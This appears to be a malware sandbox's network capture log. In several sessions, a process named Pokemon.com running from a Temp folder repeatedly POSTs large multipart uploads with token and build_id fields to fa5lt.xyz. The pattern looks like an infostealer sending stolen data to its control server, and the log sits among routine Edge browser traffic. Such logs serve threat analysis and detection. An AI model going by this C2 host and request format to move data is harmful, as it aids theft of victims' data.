                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.5 | 49899 | 116.203.8.178 | 443 | 6468 | C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:47:20 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----P89R1VSJEKFUAIWTJE3O
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: fa5lt.xyz
                                                                                                                                                                                                                                                                                    Content-Length: 68733
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Ascii: ------P89R1VSJEKFUAIWTJE3OContent-Disposition: form-data; name="token"e1d6e2869b01e5288d5e95125b4498c4------P89R1VSJEKFUAIWTJE3OContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------P89R1VSJEKFUAIWTJE3OCont
2024-12-27 13:47:21 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:21 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
2024-12-27 13:47:21 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.5 | 49908 | 172.64.41.3 | 443 | 4028 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:47:20 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-12-27 13:47:20 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Fri, 27 Dec 2024 13:47:20 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8f89c30cdf8e4399-EWR
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.5 | 49909 | 172.64.41.3 | 443 | 4028 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:47:20 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-12-27 13:47:20 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Fri, 27 Dec 2024 13:47:20 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8f89c30ced5b5e86-EWR
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.5 | 49907 | 172.64.41.3 | 443 | 4028 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:47:20 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-12-27 13:47:20 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Fri, 27 Dec 2024 13:47:20 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8f89c30d3d24de98-EWR
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.5 | 49900 | 142.250.181.65 | 443 | 4028 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:47:20 UTC | 594 | OUT | GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
Host: clients2.googleusercontent.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-27 13:47:21 UTC | 563 | IN | HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 154477
X-GUploader-UploadID: AFiumC7tH5ZzJMfNfa9BIZr8250lXMXmPl3ep-Vo_9n3cA_0tj0h-vy5u0X0e4GXYF7rzyXp
X-Goog-Hash: crc32c=F5qq4g==
Server: UploadServer
Date: Thu, 26 Dec 2024 15:58:14 GMT
Expires: Fri, 26 Dec 2025 15:58:14 GMT
Cache-Control: public, max-age=31536000
Age: 78547
Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
Content-Type: application/x-chrome-extension
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.5 | 49914 | 172.64.41.3 | 443 | 4028 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:47:21 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom)TP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.5 | 49912 | 172.64.41.3 | 443 | 4028 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:47:21 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom)TP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.5 | 49913 | 172.64.41.3 | 443 | 4028 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:47:21 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom)TP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.5 | 49929 | 116.203.8.178 | 443 | 6468 | C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:47:23 UTC | 324 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----PPHDJW4O89RIM790ZMO8
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: fa5lt.xyz
                                                                                                                                                                                                                                                                                    Content-Length: 262605
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
2024-12-27 13:47:25 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 13:47:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27192.168.2.549947116.203.8.1784436468C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:47:24 UTC | 324 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----O8Q168Y5PH47YUK6FU3E
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: fa5lt.xyz
Content-Length: 393697
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:24 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:24 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 13:47:26 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:26 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28192.168.2.549966116.203.8.1784436468C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:47:27 UTC | 324 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----SJW4W4OHLXBIEU3EUA1V
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: fa5lt.xyz
                                                                                                                                                                                                                                                                                    Content-Length: 131557
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:27 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 53 4a 57 34 57 34 4f 48 4c 58 42 49 45 55 33 45 55 41 31 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 31 64 36 65 32 38 36 39 62 30 31 65 35 32 38 38 64 35 65 39 35 31 32 35 62 34 34 39 38 63 34 0d 0a 2d 2d 2d 2d 2d 2d 53 4a 57 34 57 34 4f 48 4c 58 42 49 45 55 33 45 55 41 31 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 53 4a 57 34 57 34 4f 48 4c 58 42 49 45 55 33 45 55 41 31 56 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------SJW4W4OHLXBIEU3EUA1VContent-Disposition: form-data; name="token"e1d6e2869b01e5288d5e95125b4498c4------SJW4W4OHLXBIEU3EUA1VContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------SJW4W4OHLXBIEU3EUA1VCont
2024-12-27 13:47:29 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:28 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
2024-12-27 13:47:29 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29192.168.2.54994523.200.88.94434028C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:47:27 UTC | 751 | OUT | GET /statics/icons/favicon_newtabpage.png HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: assets.msn.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                    Cookie: _C_ETH=1; USRLOC=; MUID=1AA6CB7BE4CF62801FB6DE19E5AD630B; _EDGE_S=F=1&SID=29785E8D998166DF1E074BEF98EF6757; _EDGE_V=1
2024-12-27 13:47:28 UTC | 1004 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Content-Type: image/png
                                                                                                                                                                                                                                                                                    ETag: "bed4a7cc95f6106c7a3d46d2b50cb3f8:1614709529.490117"
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 02 Mar 2021 18:25:29 GMT
                                                                                                                                                                                                                                                                                    Server: AkamaiNetStorage
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:28 GMT
                                                                                                                                                                                                                                                                                    Content-Length: 354
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    Akamai-Request-BC: [a=23.200.89.137,b=774715594,c=g,n=US_NJ_SECAUCUS,o=20940]
                                                                                                                                                                                                                                                                                    Server-Timing: clientrtt; dur=2, clienttt; dur=0, origin; dur=0, cdntime; dur=0, wpo;dur=0,1s;dur=0
                                                                                                                                                                                                                                                                                    Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                    Akamai-Server-IP: 23.200.89.137
                                                                                                                                                                                                                                                                                    Akamai-Request-ID: 2e2d38ca
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
                                                                                                                                                                                                                                                                                    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
                                                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                    Akamai-GRN: 0.8959c817.1735307248.2e2d38ca
                                                                                                                                                                                                                                                                                    Vary: Origin


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.5 | 49972 | 116.203.8.178 | 443 | 6468 | C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:47:28 UTC | 325 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----M7YMGDTJM7G47Q16P8YU
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: fa5lt.xyz
                                                                                                                                                                                                                                                                                    Content-Length: 6990993
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
2024-12-27 13:47:28 UTC | 16355 | OUT | Data Ascii:
------M7YMGDTJM7G47Q16P8YU
Content-Disposition: form-data; name="token"

e1d6e2869b01e5288d5e95125b4498c4
------M7YMGDTJM7G47Q16P8YU
Content-Disposition: form-data; name="build_id"

c1400f115131e1fa84ea98599d53d0bd
------M7YMGDTJM7G47Q16P8YU
Cont
2024-12-27 13:47:36 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:35 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.5 | 49943 | 20.110.205.119 | 443 | 4028 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:47:29 UTC | 1175 | OUT | GET /c.gif?rnd=1735307249044&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=b651b00d73bb4a9ab8b6ca7210063a71&activityId=b651b00d73bb4a9ab8b6ca7210063a71&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: c.msn.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                    Cookie: _C_ETH=1; USRLOC=; MUID=1AA6CB7BE4CF62801FB6DE19E5AD630B; _EDGE_S=F=1&SID=29785E8D998166DF1E074BEF98EF6757; _EDGE_V=1
2024-12-27 13:47:30 UTC | 1108 | IN | HTTP/1.1 302 Redirect
                                                                                                                                                                                                                                                                                    Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                    Location: https://c.bing.com/c.gif?rnd=1735307249044&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=b651b00d73bb4a9ab8b6ca7210063a71&activityId=b651b00d73bb4a9ab8b6ca7210063a71&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=14C71902C8884738842424F5E7BBAD37&RedC=c.msn.com&MXFR=1AA6CB7BE4CF62801FB6DE19E5AD630B
                                                                                                                                                                                                                                                                                    Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                    P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                                    Set-Cookie: SM=T; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                    Set-Cookie: MUID=1AA6CB7BE4CF62801FB6DE19E5AD630B; domain=.msn.com; expires=Wed, 21-Jan-2026 13:47:30 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:29 GMT
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.5 | 49950 | 108.139.47.92 | 443 | 4028 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 13:47:29 UTC | 925 | OUT | GET /b?rn=1735307249044&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1AA6CB7BE4CF62801FB6DE19E5AD630B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-27 13:47:30 UTC | 955 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:30 GMT
                                                                                                                                                                                                                                                                                    Location: /b2?rn=1735307249044&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1AA6CB7BE4CF62801FB6DE19E5AD630B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
